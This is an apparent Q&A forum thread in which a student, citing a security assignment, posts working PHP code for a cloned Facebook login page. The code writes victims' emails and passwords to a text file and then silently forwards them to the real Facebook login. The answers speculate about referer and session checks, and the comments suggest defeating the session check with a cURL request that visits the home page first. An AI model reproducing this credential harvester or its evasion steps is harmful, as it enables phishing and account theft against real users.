# Facebook phishing detection

Tags: php, facebook, http, phishing

I'm doing a little assignment on computer security and I'm currently working on phishing.

So for educational purposes I wrote a simplist "phishing webpage" and I'm trying to understand how Facebook detects phishing fraudulent webpages.

My `index.html` is the facebook main page while I edited it in order to redirect the user to a `phishing.php` page.

`phishing.php`:

```
<?php
$file = fopen('phishing.txt', 'a');
fwrite($file, 'M: '.htmlspecialchars($_POST['email'])."\nP: ".htmlspecialchars($_POST['pass'])."\n\n");
fclose($file);
?>

<form action="https://www.facebook.com/login.php?login_attempt=1" method="post" name="frm">
<?php
    foreach ($_POST as $a => $b) {
        echo "<input type='hidden' name='".htmlentities($a)."' value='".htmlentities($b)."'>";
    }
?>

</form>
<script language="JavaScript">
    document.frm.submit();
</script>
```

My question comes here. Everything works well, excepted the fact that once the user (me) enters is username and password, Facebook says:

> **Security Notice:** For your security, never enter your Facebook password
>   on sites not located on Facebook.com

So which mechanism is used by Facebook in order to detect phishing pages like this?

Thanks!

Comment: It probably checks your referer to see if it actually comes from facebook or not..

Answer (score 3, accepted):

I can think of many ways that facebook does this

Method one:  **HTTP Referer**
In every HTTP request that you send, a referer is sent along with it to indicate where you came from, facebook can simply do the following

```
$referer = parse_url($_SERVER['HTTP_REFERER'], PHP_URL_HOST);
if($referer != 'facebook.com') // Phishing
```

Method two: **Sessions**
Facebook may start a session on their index.php page that will be checked once submit the login form, for example

```
index.php
$_SESSION['coming_from_facebook'] = true;

login.php
if($_SESSION['coming_from_facebook'] != true) // Phishing
```

This is all psuedo-code and the first method is easily bypassable as users can modify referers.

Comment: I have questions on method two: How could `$_SESSION['coming_from_facebook']` be set to false on index.php? It is always set to true according to what you say isn't it? So how is it a phishing test? Also how you think this method could be bypassed?

Comment: @segfolt It's always set to true IF AND ONLY IF you visit facebook's index first, so if you're logging in from a different page other than facebook's index.. It doesn't work.

Comment: So if I do a dummy request to Facebook.com page in my `phishing.php`script I'm supposed to bypass this method?

Comment: Yes. You can do it using cURL, save cookies in a file so that the session is presistent, visit index.php first, then login.

Comment: I have a last question: Why are you saying the first method is easily bypassable since the server cannot force the user to use a specific referer (As far as I know) ? @Ali

Comment: @segfolt It's easily bypassable because the user can easily fake his referer

Comment: How? It can't be done using Javascript, am I wrong? How the phishing webpage could "force" the user to use a specific referer? @Ali